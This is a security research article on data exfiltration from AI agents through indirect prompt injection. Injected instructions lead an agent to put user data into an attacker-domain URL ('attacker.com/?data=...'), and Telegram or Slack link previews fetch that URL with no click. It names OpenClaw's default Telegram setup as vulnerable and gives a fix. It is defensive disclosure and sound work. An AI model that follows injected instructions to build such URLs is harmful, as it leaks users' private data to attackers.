A basic technique for exfiltrating data from LLM-based applications via indirect prompt injection is to manipulate the model into outputting an attacker-controlled link with sensitive user data appended to the URL. If the link is clicked, the data is stolen.
By querying AI agents via apps (like Telegram and Slack), users can unknowingly enable a more severe attack. These apps support ‘previews’ for links found in messages; link previews make the same type of network request as clicking a link – with no user clicks required. This means that in agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link.
In this article, we walk through the attack chain and provide a test you can try to validate whether the agentic systems you use are at risk. OpenClaw (the current trending agentic system) is vulnerable to this attack when using the default Telegram configuration; an example secure configuration is provided at the end of the article. We believe insecure previews are likely to affect many other agentic systems as well.
Through this article, we aim to raise awareness of this risk. We hope to see a future in which the typical agentic system benefits from mitigations supported by both those developing agents and those developing the interfaces into which agents are integrated.
The Attack Chain
Historically, messaging and collaboration apps have supported URL previews in order to display metadata such as thumbnails, titles, and descriptions for links shared by users.
With LLMs, this becomes dangerous. Indirect prompt injections can manipulate AI agents to include malicious URLs in their response to users. In this attack, the agent is manipulated to construct a URL that uses an attacker’s domain, with dynamically generated query parameters appended that contain sensitive data the model knows about the user.
attacker.com/?data=
{AI APPENDS SENSITIVE DATA HERE}
When an AI agent sends a message to the user containing a malicious URL, if the URL is not previewed, the attack requires the user to click the malicious link, which triggers a network request to the attacker’s server (thereby exposing data stored in the URL). However, if the URL is previewed, a request is made to the attacker’s domain to retrieve metadata for the preview – without requiring any user interaction. After the preview request is made, the attacker can read their request logs to see the sensitive user data the model appended to the preview request URL.
Secure OpenClaw Telegram Configuration
For users communicating with OpenClaw using Telegram, there is an explicit configuration you can use to disable link previews! Try the experiment from above again after disabling link previews, and you’ll see that data is no longer sent to AITextRisk.com!
In the file ~/.openclaw/openclaw.json, add the line linkPreview: false in the channels > telegram object.
Test Results
On AITextRisk.com, you can see when one of your agentic systems has created a preview of the site, and what data was passed through the preview request. We’ve also included a graph of the most seen scrapers used to create URL previews (such as Slackbot, Telegram bot, etc.). Furthermore, people can ‘claim’ their logs to report what agent was responsible; this powers a display of the most risky agent/app combinations. We also allow users to report agentic systems that they have tested that did not create the preview, providing data for a display of which agentic systems do not appear to insecurely preview links. As a whole, this allows you to test whether the agentic systems you use generate insecure previews for URLs in LLM-generated messages.
Many agentic systems are being integrated into many apps. It falls on communication apps to expose link preview preferences to developers, and agent developers to leverage the preferences provided (or give the choice to the end user!). We’d like to see communication apps consider supporting custom link preview configurations on a chat/channel-specific basis to create LLM-safe channels.